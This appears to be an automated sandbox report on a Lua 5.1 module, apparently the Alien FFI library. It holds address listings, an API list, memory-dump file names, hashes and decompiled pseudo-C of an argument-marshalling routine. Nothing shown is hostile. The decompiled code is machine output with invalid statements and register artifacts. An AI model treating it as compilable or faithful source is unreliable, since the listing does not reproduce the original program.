0x00a225d6
0x00a225d9
0x00a225dc
0x00a225df
0x00a225e2
0x00a225e3
0x00000000
0x00000000
0x00a22594
0x00a22594
0x00a22597
0x00a2259b
0x00a2259b
0x00a225a0
0x00a225a4
0x00a225a9
0x00a225ac
0x00a225af
0x00a225b2
0x00a225b3
0x00000000
0x00000000
0x00a22623
0x00a22624
0x00a22624
0x00a22628
0x00a2262b
0x00a2262f
0x00a22633
0x00a22638
0x00a2263b
0x00000000
0x00000000
0x00a2256b
0x00a2256c
0x00a2256c
0x00a22570
0x00a22573
0x00a22577
0x00a2257b
0x00a22580
0x00a22583
0x00a22586
0x00a22589
0x00a2258a
0x00000000
0x00000000
0x00a225ed
0x00a225ee
0x00a225ee
0x00a225f2
0x00a225f5
0x00a225f9
0x00a225fd
0x00a22602
0x00a22605
0x00a22608
0x00a2260a
0x00a2260c
0x00a2260c
0x00a22612
0x00a22615
0x00a22618
0x00a22619
0x00000000
0x00000000
0x00a2251a
0x00a22528
0x00a2252d
0x00a2252e
0x00a22533
0x00000000
0x00000000
0x00a226a0
0x00a226a1
0x00a226a1
0x00a226a5
0x00a226a8
0x00a226ac
0x00a226b0
0x00a226b5
0x00a226b8
0x00a226bb
0x00a226be
0x00a226bf
0x00000000
0x00000000
0x00a226c9
0x00a226c9
0x00a226cc
0x00a226d0
0x00a226d0
0x00a226d5
0x00a226d9
0x00a226de
0x00a226e1
0x00a226e4
0x00a226e7
0x00a226e8
0x00000000
0x00000000
0x00a22640
0x00a22641
0x00a22641
0x00a22645
0x00a22648
0x00a2264c
0x00a22650
0x00a22655
0x00a22659
0x00a2265c
0x00a2265f
0x00a22662
0x00a22665
0x00a22666
0x00000000
0x00000000
0x00a22670
0x00a22671
0x00a22671
0x00a22675
0x00a22678
0x00a2267c
0x00a22680
0x00a22685
0x00a22689
0x00a2268c
0x00a2268f
0x00a22692
0x00a22695
0x00a22696
0x00000000
0x00000000
0x00a226f2
0x00a226f2
0x00a226f5
0x00a226f9
0x00a226f9
0x00a22702
0x00a22707
0x00a2270f
0x00000000
0x00000000
0x00a22711
0x00a22711
0x00a22712
0x00a22713
0x00a22718
0x00000000
0x00000000
0x00a22728
0x00a22728
0x00a2272b
0x00a2272f
0x00a2272f
0x00a22738
0x00a2273d
0x00a22745
0x00a2271d
0x00a2271d
0x00a2271e
0x00a22723
0x00000000
0x00a22723
0x00a22747
0x00a22747
0x00a22748
0x00a22749
0x00a2274e
0x00000000
0x00000000
0x00a22513

APIs

lua_isuserdata.LUA5.1 ref: 00A22285
lua_type.LUA5.1 ref: 00A22293
lua_touserdata.LUA5.1 ref: 00A222B3
lua_type.LUA5.1 ref: 00A222CD
lua_pushnil.LUA5.1(?,?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00A2252E

Part of subcall function 00A24130: __alloca_probe_16.LIBCMT ref: 00A24160

lua_pushnumber.LUA5.1(?,?,?), ref: 00A22561
lua_pushnumber.LUA5.1(?), ref: 00A227CE
lua_pushnumber.LUA5.1(?), ref: 00A227F4

Memory Dump Source

Source File: 00000003.00000002.487114164.0000000000A21000.00000020.00020000.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000003.00000002.487089623.0000000000A20000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.487157920.0000000000A25000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.487201925.0000000000A27000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.487230936.0000000000A28000.00000002.00020000.sdmp Download File

Similarity

API ID: lua_pushnumber.$lua_type.$__alloca_probe_16lua_isuserdata.lua_pushnil.lua_touserdata.
String ID:
API String ID: 2469171799-0
Opcode ID: c33d5dfd20d259cd4b0213052332c0d8422f5b9647ed1174abc7a80087a02c13
Instruction ID: c2b0f89a3ca748549dfebcebef951819fa8dbbc5ee158778524425166b46e28a
Opcode Fuzzy Hash: c33d5dfd20d259cd4b0213052332c0d8422f5b9647ed1174abc7a80087a02c13
Instruction Fuzzy Hash: 9FC1A3B5D04125ABCB04EF98FE81EEEBBB9FF49300F144168F441A7206D6399A15CB65

Uniqueness

Uniqueness Score: -1.00%

Function 00A2237E, Relevance: 30.3, APIs: 20, Instructions: 342
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E00A2237E(void* __edi, long long __fp0) {
				long long* __ebx;
				void* __esi;
				intOrPtr _t220;
				signed int _t223;
				char* _t224;
				signed int _t225;
				char* _t226;
				signed int _t237;
				void* _t245;
				void* _t247;
				intOrPtr* _t248;
				intOrPtr _t249;
				intOrPtr _t250;
				intOrPtr* _t260;
				void* _t270;
				signed int _t271;
				void* _t272;
				void* _t274;
				signed int _t275;
				intOrPtr _t277;
				intOrPtr _t278;
				void* _t279;
				void* _t280;
				long long _t292;

				L0:
				while(1) {
					L0:
					_t292 = __fp0;
					_t270 = __edi;
					_t220 = E00A246A0(4);
					 *((intOrPtr*)(_t275 - 8)) = _t277;
					_push(_t245);
					L00A23F4A();
					_t278 = _t277 + 8;
					if(_t220 != 0) {
						_push(_t245);
						_push(_t273);
						L00A23F56();
						_t279 = _t278 + 8;
						if(_t220 == 0) {
							_push(_t245);
							_push(_t273);
							L00A23F0E();
							_t248 =  *((intOrPtr*)(_t275 - 8));
							 *_t248 = _t220;
							_t278 = _t279 + 8;
							 *((intOrPtr*)( *((intOrPtr*)(_t275 - 0xc)) + __edi)) = _t248;
						} else {
							_push(0);
							_push(_t245);
							_push(_t273);
							L00A23F5C();
							_t260 =  *((intOrPtr*)(_t275 - 8));
							 *_t260 = _t220;
							_t278 = _t279 + 0xc;
							 *((intOrPtr*)( *((intOrPtr*)(_t275 - 0xc)) + __edi)) = _t260;
						}
					} else {
						__ecx =  *(__ebp - 8);
						 *__ecx = __eax;
						__eax =  *(__ebp - 0xc);
						 *(__eax + __edi) = __ecx;
					}
					while(1) {
						L36:
						 *((intOrPtr*)(_t275 - 0xc)) =  *((intOrPtr*)(_t275 - 0xc)) + 4;
						_t245 = _t245 + 1;
						_t116 = _t275 - 0x4c;
						 *_t116 =  *((intOrPtr*)(_t275 - 0x4c)) - 1;
						if( *_t116 == 0) {
							break;
						}
						L1:
						_t249 =  *((intOrPtr*)(_t275 - 0x14));
						_t223 =  *( *((intOrPtr*)(_t275 - 0xc)) +  *((intOrPtr*)(_t249 + 0x30)));
						if(_t223 > 0x11) {
							L33:
							_t224 =  *(_t249 + 8);
							if(_t224 == 0) {
								_t224 = "anonymous";
							}
							_push(_t224);
							_push(_t245);
							_push("alien: parameter %i is of unknown type (function %s)");
							_push(_t273);
							L00A23F26();
							_t278 = _t278 + 0x10;
							continue;
						}
						L2:
						switch( *((intOrPtr*)(_t223 * 4 +  &M00A2287C))) {
							case 0:
								L3:
								_t242 = E00A246A0(4);
								 *((intOrPtr*)(_t275 - 8)) = _t278;
								_push(_t245);
								_push(_t273);
								L00A23F68();
								_t278 = _t278 + 8;
								_t243 = E00A245C0(_t242, _t292);
								_t259 =  *((intOrPtr*)(_t275 - 8));
								_t261 =  *((intOrPtr*)(_t275 - 0xc));
								 *_t259 = _t243;
								 *((intOrPtr*)( *((intOrPtr*)(_t275 - 0xc)) + _t270)) = _t259;
								goto L36;
							case 1:
								L6:
								4 = E00A246A0(4);
								 *(__ebp - 8) = __esp;
								_push(__ebx);
								_push(__esi);
								L00A23F68();
								asm("fnstcw word [ebp-0xe]");
								__eax =  *(__ebp - 0xe) & 0x0000ffff;
								__edx =  *(__ebp - 0xc);
								__esp = __esp + 8;
								__eax =  *(__ebp - 0xe) & 0x0000ffff | 0x00000c00;
								 *(__ebp - 0x18) =  *(__ebp - 0xe) & 0x0000ffff | 0x00000c00;
								__eax =  *(__ebp - 8);
								asm("fldcw word [ebp-0x18]");
								asm("fistp dword [ebp-0x18]");
								 *__eax =  *(__ebp - 0x18);
								 *(__edx + __edi) = __eax;
								asm("fldcw word [ebp-0xe]");
								goto L36;
							case 2:
								L5:
								__eax = 4;
								__eax = E00A246A0(4);
								 *(__ebp - 8) = __esp;
								_push(__ebx);
								_push(__esi);
								L00A23F68();
								__esp = __esp + 8;
								__eax = E00A245C0(__eax, __fp0);
								__ecx =  *(__ebp - 8);
								__edx =  *(__ebp - 0xc);
								 *__ecx = __eax;
								 *(__edx + __edi) = __ecx;
								goto L36;
							case 3:
								L8:
								4 = E00A246A0(4);
								 *(__ebp - 8) = __esp;
								_push(__ebx);
								_push(__esi);
								L00A23F68();
								asm("fnstcw word [ebp-0xe]");
								__eax =  *(__ebp - 0xe) & 0x0000ffff;
								__edx =  *(__ebp - 0xc);
								__esp = __esp + 8;
								__eax =  *(__ebp - 0xe) & 0x0000ffff | 0x00000c00;
								 *(__ebp - 0x18) =  *(__ebp - 0xe) & 0x0000ffff | 0x00000c00;
								__eax =  *(__ebp - 8);
								asm("fldcw word [ebp-0x18]");
								asm("fistp qword [ebp-0x1c]");
								__ecx =  *(__ebp - 0x1c);
								 *__eax = __ecx;
								 *(__edx + __edi) = __eax;
								asm("fldcw word [ebp-0xe]");
								goto L36;
							case 4:
								L4:
								__eax = 4;
								__eax = E00A246A0(4);
								 *(__ebp - 8) = __esp;
								_push(__ebx);
								_push(__esi);
								L00A23F68();
								__esp = __esp + 8;
								__eax = E00A245C0(__eax, __fp0);
								__ecx =  *(__ebp - 8);
								 *__ecx = __eax;
								__eax =  *(__ebp - 0xc);
								 *(__eax + __edi) = __ecx;
								goto L36;
							case 5:
								L7:
								4 = E00A246A0(4);
								 *(__ebp - 8) = __esp;
								_push(__ebx);
								_push(__esi);
								L00A23F68();
								asm("fnstcw word [ebp-0xe]");
								__eax =  *(__ebp - 0xe) & 0x0000ffff;
								__edx =  *(__ebp - 0xc);
								__esp = __esp + 8;
								__eax =  *(__ebp - 0xe) & 0x0000ffff | 0x00000c00;
								 *(__ebp - 0x18) =  *(__ebp - 0xe) & 0x0000ffff | 0x00000c00;
								__eax =  *(__ebp - 8);
								asm("fldcw word [ebp-0x18]");
								asm("fistp qword [ebp-0x1c]");
								__ecx =  *(__ebp - 0x1c);
								 *__eax = __ecx;
								 *(__edx + __edi) = __eax;
								asm("fldcw word [ebp-0xe]");
								goto L36;
							case 6:
								goto L33;
							case 7:
								L11:
								4 = E00A246A0(4);
								 *(__ebp - 8) = __esp;
								_push(__ebx);
								_push(__esi);
								L00A23F68();
								__eax =  *(__ebp - 8);
								__ecx =  *(__ebp - 0xc);
								 *__eax = __fp0;
								__esp = __esp + 8;
								 *(__ecx + __edi) = __eax;
								goto L36;
							case 8:
								L12:
								8 = E00A24686(8);
								 *(__ebp - 8) = __esp;
								_push(__ebx);
								_push(__esi);
								L00A23F68();
								__eax =  *(__ebp - 8);
								__edx =  *(__ebp - 0xc);
								 *__eax = __fp0;
								__esp = __esp + 8;
								 *(__edx + __edi) = __eax;
								goto L36;
							case 9:
								L9:
								4 = E00A246A0(4);
								 *(__ebp - 8) = __esp;
								_push(__ebx);
								_push(__esi);
								L00A23F62();
								__ecx =  *(__ebp - 8);
								 *__ecx = __al;
								__eax =  *(__ebp - 0xc);
								__esp = __esp + 8;
								 *(__eax + __edi) = __ecx;
								goto L36;
							case 0xa:
								L10:
								__eax = 4;
								__eax = E00A246A0(4);
								 *(__ebp - 8) = __esp;
								_push(__ebx);
								_push(__esi);
								L00A23F62();
								__ecx =  *(__ebp - 8);
								__edx =  *(__ebp - 0xc);
								 *__ecx = __al;
								__esp = __esp + 8;
								 *(__edx + __edi) = __ecx;
								goto L36;
							case 0xb:
								L13:
								__eax = 4;
								__eax = E00A246A0(4);
								 *(__ebp - 8) = __esp;
								_push(__ebx);
								_push(__esi);
								L00A23F50();
								__esp = __esp + 8;
								_push(__ebx);
								_push(__esi);
								if(__eax == 0) {
									L00A23F4A();
									__esp = __esp + 8;
									if(__eax != 0) {
										_push(0);
										_push(__ebx);
										_push(__esi);
										L00A23F5C();
										__edx =  *(__ebp - 8);
										__ecx =  *(__ebp - 0xc);
										 *__edx = __eax;
										__eax = __edx;
										__esp = __esp + 0xc;
										 *(__ecx + __edi) = __eax;
									} else {
										__edx =  *(__ebp - 8);
										__ecx =  *(__ebp - 0xc);
										 *__edx = __eax;
										__eax = __edx;
										 *(__ecx + __edi) = __eax;
									}
								} else {
									L00A23F4A();
									__esp = __esp + 8;
									if(__eax != 0) {
										_push(__ebx);
										_push(__esi);
										L00A23F0E();
										__ecx =  *(__ebp - 8);
										 *__ecx = __eax;
										__eax = __ecx;
										__ecx =  *(__ebp - 0xc);
										__esp = __esp + 8;
										 *(__ecx + __edi) = __eax;
									} else {
										__ecx =  *(__ebp - 8);
										 *__ecx = __eax;
										__eax = __ecx;
										__ecx =  *(__ebp - 0xc);
										 *(__ecx + __edi) = __eax;
									}
								}
								goto L36;
							case 0xc:
								goto L0;
							case 0xd:
								L29:
								_push(__ebx);
								_push(__esi);
								L00A23F68();
								__esp = __esp + 8;
								__eax = E00A245C0(__eax, __fp0);
								__ecx =  *(__ebp - 0x24);
								 *( *(__ebp - 0x24)) = __eax;
								4 = E00A246A0(4);
								__ecx =  *(__ebp - 0x24);
								__edx =  *(__ebp - 0xc);
								__eax = __esp;
								 *__eax = __ecx;
								__ecx = __ecx + 4;
								 *(__edx + __edi) = __eax;
								 *(__ebp - 0x24) = __ecx;
								goto L36;
							case 0xe:
								L30:
								_push(__ebx);
								_push(__esi);
								L00A23F68();
								asm("fnstcw word [ebp-0xe]");
								__eax =  *(__ebp - 0xe) & 0x0000ffff;
								__ecx =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0xe) & 0x0000ffff | 0x00000c00;
								 *(__ebp - 0x18) =  *(__ebp - 0xe) & 0x0000ffff | 0x00000c00;
								__esp = __esp + 8;
								asm("fldcw word [ebp-0x18]");
								asm("fistp qword [ebp-0x1c]");
								__eax =  *(__ebp - 0x1c);
								 *( *(__ebp - 0x28)) =  *(__ebp - 0x1c);
								__eax = 4;
								asm("fldcw word [ebp-0xe]");
								__eax = E00A246A0(4);
								__ecx =  *(__ebp - 0x28);
								__edx =  *(__ebp - 0xc);
								__eax = __esp;
								 *__eax = __ecx;
								__ecx = __ecx + 4;
								 *(__edx + __edi) = __eax;
								 *(__ebp - 0x28) = __ecx;
								goto L36;
							case 0xf:
								L31:
								_push(__ebx);
								_push(__esi);
								L00A23F68();
								__esp = __esp + 8;
								__eax = E00A245C0(__eax, __fp0);
								__ecx =  *(__ebp - 0x2c);
								 *( *(__ebp - 0x2c)) = __al;
								4 = E00A246A0(4);
								__ecx =  *(__ebp - 0x2c);
								__edx =  *(__ebp - 0xc);
								__eax = __esp;
								 *__eax = __ecx;
								__ecx = __ecx + 1;
								 *(__edx + __edi) = __eax;
								 *(__ebp - 0x2c) = __ecx;
								goto L36;
							case 0x10:
								L32:
								_push(__ebx);
								_push(__esi);
								L00A23F68();
								__eax =  *(__ebp - 0x40);
								 *( *(__ebp - 0x40)) = __fp0;
								__esp = __esp + 8;
								4 = E00A246A0(4);
								__ecx =  *(__ebp - 0x40);
								__edx =  *(__ebp - 0xc);
								__eax = __esp;
								 *__eax = __ecx;
								__ecx = __ecx + 8;
								 *(__edx + __edi) = __eax;
								 *(__ebp - 0x40) = __ecx;
								goto L36;
							case 0x11:
								L20:
								__eax = 4;
								__eax = E00A246A0(4);
								 *(__ebp - 8) = __esp;
								__eax = E00A21110(__eax, __ebx, __esi, "alien_callback");
								if(__eax == 0) {
									__eax = E00A21110(__eax, __ebx, __esi, "alien_function");
									if(__eax == 0) {
										_push("alien function or callback expected");
										_push(__ebx);
										_push(__esi);
										L00A23F14();
										__ecx =  *(__ebp - 8);
										__edx =  *(__ebp - 0xc);
										__esp = __esp + 0xc;
										__eax = 0;
										 *__ecx = 0;
										 *(__edx + __edi) = __ecx;
									} else {
										__eax =  *(__eax + 4);
										__ecx =  *(__ebp - 8);
										__edx =  *(__ebp - 0xc);
										 *__ecx = __eax;
										 *(__edx + __edi) = __ecx;
									}
								} else {
									__eax =  *__eax;
									__ecx =  *(__ebp - 8);
									__edx =  *(__ebp - 0xc);
									 *__ecx = __eax;
									 *(__edx + __edi) = __ecx;
								}
								goto L36;
						}
					}
					L37:
					_t250 =  *((intOrPtr*)(_t275 - 0x14));
					 *((intOrPtr*)(_t275 - 0x3c)) = 0;
					_t225 =  *(_t250 + 0xc);
					if(_t225 > 0xc) {
						L58:
						_t226 =  *(_t250 + 8);
						if(_t226 == 0) {
							_t226 = "anonymous";
						}
						_push(_t226);
						_push("alien: unknown return type (function %s)");
						_push(_t273);
						L00A23F26();
						L61:
						_t280 = _t278 + 0xc;
						L62:
						 *((intOrPtr*)(_t275 - 0x24)) =  *((intOrPtr*)(_t275 - 0x24)) +  ~( *(_t275 - 0x48)) * 4;
						 *((intOrPtr*)(_t275 - 0x2c)) =  *((intOrPtr*)(_t275 - 0x2c)) -  *((intOrPtr*)(_t275 - 0x30));
						_t271 = 0;
						 *((intOrPtr*)(_t275 - 0x28)) =  *((intOrPtr*)(_t275 - 0x28)) +  ~( *(_t275 - 0x38)) * 4;
						if( *((intOrPtr*)(_t275 - 0x44)) <= 0) {
							L72:
							_pop(_t272);
							_pop(_t274);
							_pop(_t247);
							return E00A245A4( *((intOrPtr*)(_t275 - 0x30)) +  *((intOrPtr*)(_t275 - 0x34)) +  *(_t275 - 0x38) +  *(_t275 - 0x48) + 1, _t247,  *(_t275 - 4) ^ _t275,  *(_t275 - 0x48), _t272, _t274);
						} else {
							goto L63;
						}
						do {
							L63:
							_t237 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t275 - 0x14)) + 0x30)) + _t271 * 4)) + 0xfffffff3;
							if(_t237 > 3) {
								goto L71;
							}
							L64:
							switch( *((intOrPtr*)(_t237 * 4 +  &M00A228F8))) {
								case 0:
									L65:
									asm("fild dword [ecx]");
									_t283 = _t280 - 8;
									 *_t283 = _t292;
									_push(_t273);
									L00A23F80();
									_t280 = _t283 + 0xc;
									 *((intOrPtr*)(_t275 - 0x24)) =  *((intOrPtr*)(_t275 - 0x24)) + 4;
									goto L71;
								case 1:
									L66:
									__edx =  *(__ebp - 0x28);
									__eax =  *__edx;
									asm("fild dword [edx]");
									if(__eax < 0) {
										__fp0 = __fp0 +  *0xa25878;
									}
									__esp = __esp - 8;
									 *__esp = __fp0;
									_push(__esi);
									L00A23F80();
									__esp = __esp + 0xc;
									 *(__ebp - 0x28) =  *(__ebp - 0x28) + 4;
									goto L71;
								case 2:
									L70:
									__ecx =  *(__ebp - 0x2c);
									__edx =  *__ecx;
									 *(__ebp - 0x18) = __edx;
									__esp = __esp - 8;
									asm("fild dword [ebp-0x18]");
									 *__esp = __fp0;
									_push(__esi);
									L00A23F80();
									__esp = __esp + 0xc;
									 *(__ebp - 0x2c) =  *(__ebp - 0x2c) + 1;
									goto L71;
								case 3:
									L69:
									__fp0 =  *__ebx;
									__esp = __esp - 8;
									 *__esp = __fp0;
									_push(__esi);
									L00A23F80();
									__esp = __esp + 0xc;
									__ebx = __ebx + 8;
									goto L71;
							}
							L71:
							_t271 = _t271 + 1;
						} while (_t271 <  *((intOrPtr*)(_t275 - 0x44)));
						goto L72;
					}
					L38:
					switch( *((intOrPtr*)(_t225 * 4 +  &M00A228C4))) {
						case 0:
							L40:
							__eax =  *(__ebp - 0x14);
							__ecx =  *(__eax + 4);
							__edx = __ebp - 0x20;
							__eax = __eax + 0x10;
							__eax = E00A24130(__ebx, __ebp - 0x20, __edi, __fp0, __eax,  *(__eax + 4), __ebp - 0x20, __edi);
							__edx =  *(__ebp - 0x20);
							 *(__ebp - 0x18) = __edx;
							__esp = __esp + 8;
							asm("fild dword [ebp-0x18]");
							 *__esp = __fp0;
							_push(__esi);
							L00A23F80();
							goto L61;
						case 1:
							L43:
							__eax =  *(__ebp - 0x14);
							__ecx =  *(__eax + 4);
							_t138 = __ebp - 0x20; // -28
							__edx = _t138;
							__eax = __eax + 0x10;
							__eax = E00A24130(__ebx, _t138, __edi, __fp0, __eax,  *(__eax + 4), _t138, __edi);
							__edx =  *(__ebp - 0x20) & 0x0000ffff;
							 *(__ebp - 0x18) = __edx;
							__esp = __esp + 8;
							asm("fild dword [ebp-0x18]");
							 *__esp = __fp0;
							_push(__esi);
							L00A23F80();
							goto L61;
						case 2:
							L42:
							__eax =  *(__ebp - 0x14);
							__ecx =  *(__eax + 4);
							_t135 = __ebp - 0x20; // -28
							__edx = _t135;
							__eax = __eax + 0x10;
							__eax = E00A24130(__ebx, __edx, __edi, __fp0, __eax,  *(__eax + 4), __edx, __edi); // executed
							asm("fild dword [ebp-0x20]");
							__esp = __esp + 8;
							 *__esp = __fp0;
							_push(__esi);
							L00A23F80();
							goto L61;
						case 3:
							L48:
							_t145 = __ebp - 0x20; // -28
							__eax = _t145;
							__eax =  *(__ebp - 0x14);
							__ecx =  *(__eax + 4);
							__eax = __eax + 0x10;
							__eax = E00A24130(__ebx, __edx, __edi, __fp0, __eax,  *(__eax + 4), _t145, __edi);
							asm("fild dword [ebp-0x20]");
							__edx =  *(__ebp - 0x20);
							goto L45;
						case 4:
							L41:
							_t130 = __ebp - 0x54; // -80
							__eax = _t130;
							__eax =  *(__ebp - 0x14);
							__ecx =  *(__eax + 4);
							__eax = __eax + 0x10;
							__eax = E00A24130(__ebx, __edx, __edi, __fp0, __eax,  *(__eax + 4), _t130, __edi);
							asm("fild dword [ebp-0x54]");
							__esp = __esp + 8;
							 *__esp = __fp0;
							_push(__esi);
							L00A23F80();
							goto L61;
						case 5:
							L44:
							_t141 = __ebp - 0x58; // -84
							__eax = _t141;
							__eax =  *(__ebp - 0x14);
							__ecx =  *(__eax + 4);
							__eax = __eax + 0x10;
							__eax = E00A24130(__ebx, __edx, __edi, __fp0, __eax,  *(__eax + 4), _t141, __edi);
							asm("fild dword [ebp-0x58]");
							__edx =  *(__ebp - 0x58);
							L45:
							if(__edx < 0) {
								__fp0 = __fp0 +  *0xa25878;
							}
							__esp = __esp + 8;
							 *__esp = __fp0;
							_push(__esi);
							L00A23F80();
							goto L61;
						case 6:
							L39:
							E00A24130(_t245, _t261, _t270, _t292,  *((intOrPtr*)(_t275 - 0x14)) + 0x10,  *((intOrPtr*)( *((intOrPtr*)(_t275 - 0x14)) + 4)), 0, _t270);
							_push(_t273);
							L00A23F74();
							_t280 = _t278 + 0x14;
							goto L62;
						case 7:
							L51:
							_t159 = __ebp - 0x50; // -76
							__eax = _t159;
							__eax =  *(__ebp - 0x14);
							__ecx =  *(__eax + 4);
							__eax = __eax + 0x10;
							__eax = E00A24130(__ebx, __edx, __edi, __fp0, __eax,  *(__eax + 4), _t159, __edi);
							__fp0 =  *(__ebp - 0x50);
							__esp = __esp + 8;
							 *__esp = __fp0;
							_push(__esi);
							L00A23F80();
							goto L61;
						case 8:
							L52:
							__eax =  *(__ebp - 0x14);
							__ecx =  *(__eax + 4);
							_t165 = __ebp - 0x60; // -92
							__edx = _t165;
							__eax = __eax + 0x10;
							__eax = E00A24130(__ebx, __edx, __edi, __fp0, __eax,  *(__eax + 4), __edx, __edi);
							__fp0 =  *(__ebp - 0x60);
							__esp = __esp + 8;
							 *__esp = __fp0;
							_push(__esi);
							L00A23F80();
							goto L61;
						case 9:
							L49:
							_t149 = __ebp - 0x20; // -28
							__eax = _t149;
							__eax =  *(__ebp - 0x14);
							__ecx =  *(__eax + 4);
							__eax = __eax + 0x10;
							__eax = E00A24130(__ebx, __edx, __edi, __fp0, __eax,  *(__eax + 4), _t149, __edi);
							__edx =  *(__ebp - 0x20) & 0x000000ff;
							 *(__ebp - 0x18) = __edx;
							__esp = __esp + 8;
							asm("fild dword [ebp-0x18]");
							 *__esp = __fp0;
							_push(__esi);
							L00A23F80();
							goto L61;
						case 0xa:
							L50:
							_t154 = __ebp - 0x20; // -28
							__eax = _t154;
							__eax =  *(__ebp - 0x14);
							__ecx =  *(__eax + 4);
							__eax = __eax + 0x10;
							__eax = E00A24130(__ebx, __edx, __edi, __fp0, __eax,  *(__eax + 4), _t154, __edi);
							__edx =  *(__ebp - 0x20);
							 *(__ebp - 0x18) = __edx;
							__esp = __esp + 8;
							asm("fild dword [ebp-0x18]");
							 *__esp = __fp0;
							_push(__esi);
							L00A23F80();
							goto L61;
						case 0xb:
							L53:
							__eax =  *(__ebp - 0x14);
							__ecx =  *(__eax + 4);
							_t169 = __ebp - 0x3c; // -56
							__edx = _t169;
							__eax = E00A24130(__ebx, __edx, __edi, __fp0, __eax,  *(__eax + 4), __edx, __edi);
							__eax =  *(__ebp - 0x3c);
							if(__eax == 0) {
								goto L55;
							}
							L54:
							_push(__eax);
							_push(__esi);
							L00A23EF0();
							__esp = __esp + 8;
							goto L62;
						case 0xc:
							L56:
							__eax =  *(__ebp - 0x14);
							__ecx =  *(__eax + 4);
							_t173 = __ebp - 0x3c; // -56
							__edx = _t173;
							__eax = E00A24130(__ebx, __edx, __edi, __fp0, __eax,  *(__eax + 4), __edx, __edi);
							__eax =  *(__ebp - 0x3c);
							if(__eax == 0) {
								L55:
								_push(__esi);
								L00A23F74();
								__esp = __esp + 4;
								goto L62;
							}
							L57:
							_push(__eax);
							_push(__esi);
							L00A23F7A();
							__esp = __esp + 8;
							goto L62;
					}
				}
			}

0x00a2237e
0x00a2237e
0x00a2237e
0x00a2237e
0x00a2237e
0x00a22383
0x00a22388
0x00a2238b
0x00a2238d
0x00a22392
0x00a22397
0x00a223a9
0x00a223aa
0x00a223ab
0x00a223b0
0x00a223b5
0x00a223d3
0x00a223d4
0x00a223d5
0x00a223da
0x00a223dd
0x00a223e2
0x00a223e5
0x00a223b7
0x00a223b7
0x00a223b9
0x00a223ba
0x00a223bb
0x00a223c0
0x00a223c3
0x00a223c8
0x00a223cb
0x00a223cb
0x00a22399
0x00a22399
0x00a2239c
0x00a2239e
0x00a223a1
0x00a223a1
0x00a224ec
0x00a224ec
0x00a224ec
0x00a224f0
0x00a224f3
0x00a224f3
0x00a224f7
0x00000000
0x00000000
0x00a22071
0x00a22071
0x00a2207a
0x00a22080
0x00a224d0
0x00a224d0
0x00a224d5
0x00a224d7
0x00a224d7
0x00a224dc
0x00a224dd
0x00a224de
0x00a224e3
0x00a224e4
0x00a224e9
0x00000000
0x00a224e9
0x00a22086
0x00a22086
0x00000000
0x00a2208d
0x00a22092
0x00a22097
0x00a2209a
0x00a2209b
0x00a2209c
0x00a220a1
0x00a220a4
0x00a220a9
0x00a220ac
0x00a220af
0x00a220b2
0x00000000
0x00000000
0x00a22112
0x00a22117
0x00a2211c
0x00a2211f
0x00a22120
0x00a22121
0x00a22126
0x00a22129
0x00a2212d
0x00a22130
0x00a22133
0x00a22138
0x00a2213b
0x00a2213e
0x00a22141
0x00a22148
0x00a2214b
0x00a2214e
0x00000000
0x00000000
0x00a220e6
0x00a220e6
0x00a220eb
0x00a220f0
0x00a220f3
0x00a220f4
0x00a220f5
0x00a220fa
0x00a220fd
0x00a22102
0x00a22105
0x00a22108
0x00a2210a
0x00000000
0x00000000
0x00a22198
0x00a2219d
0x00a221a2
0x00a221a5
0x00a221a6
0x00a221a7
0x00a221ac
0x00a221af
0x00a221b3
0x00a221b6
0x00a221b9
0x00a221be
0x00a221c1
0x00a221c4
0x00a221c7
0x00a221ca
0x00a221cd
0x00a221cf
0x00a221d2
0x00000000
0x00000000
0x00a220ba
0x00a220ba
0x00a220bf
0x00a220c4
0x00a220c7
0x00a220c8
0x00a220c9
0x00a220ce
0x00a220d1
0x00a220d6
0x00a220d9
0x00a220db
0x00a220de
0x00000000
0x00000000
0x00a22156
0x00a2215b
0x00a22160
0x00a22163
0x00a22164
0x00a22165
0x00a2216a
0x00a2216d
0x00a22171
0x00a22174
0x00a22177
0x00a2217c
0x00a2217f
0x00a22182
0x00a22185
0x00a22188
0x00a2218b
0x00a2218d
0x00a22190
0x00000000
0x00000000
0x00000000
0x00000000
0x00a22228
0x00a2222d
0x00a22232
0x00a22235
0x00a22236
0x00a22237
0x00a2223c
0x00a2223f
0x00a22242
0x00a22244
0x00a22247
0x00000000
0x00000000
0x00a2224f
0x00a22254
0x00a22259
0x00a2225c
0x00a2225d
0x00a2225e
0x00a22263
0x00a22266
0x00a22269
0x00a2226b
0x00a2226e
0x00000000
0x00000000
0x00a221da
0x00a221df
0x00a221e4
0x00a221e7
0x00a221e8
0x00a221e9
0x00a221ee
0x00a221f1
0x00a221f3
0x00a221f6
0x00a221f9
0x00000000
0x00000000
0x00a22201
0x00a22201
0x00a22206
0x00a2220b
0x00a2220e
0x00a2220f
0x00a22210
0x00a22215
0x00a22218
0x00a2221b
0x00a2221d
0x00a22220
0x00000000
0x00000000
0x00a22276
0x00a22276
0x00a2227b
0x00a22280
0x00a22283
0x00a22284
0x00a22285
0x00a2228a
0x00a2228f
0x00a22290
0x00a22291
0x00a222cd
0x00a222d2
0x00a222d7
0x00a222eb
0x00a222ed
0x00a222ee
0x00a222ef
0x00a222f4
0x00a222f7
0x00a222fa
0x00a222fc
0x00a222fe
0x00a22301
0x00a222d9
0x00a222d9
0x00a222dc
0x00a222df
0x00a222e1
0x00a222e3
0x00a222e3
0x00a22293
0x00a22293
0x00a22298
0x00a2229d
0x00a222b1
0x00a222b2
0x00a222b3
0x00a222b8
0x00a222bb
0x00a222bd
0x00a222bf
0x00a222c2
0x00a222c5
0x00a2229f
0x00a2229f
0x00a222a2
0x00a222a4
0x00a222a6
0x00a222a9
0x00a222a9
0x00a2229d
0x00000000
0x00000000
0x00000000
0x00000000
0x00a223ed
0x00a223ed
0x00a223ee
0x00a223ef
0x00a223f4
0x00a223f7
0x00a223fc
0x00a223ff
0x00a22406
0x00a2240b
0x00a2240e
0x00a22411
0x00a22413
0x00a22415
0x00a22418
0x00a2241b
0x00000000
0x00000000
0x00a22423
0x00a22423
0x00a22424
0x00a22425
0x00a2242a
0x00a2242d
0x00a22431
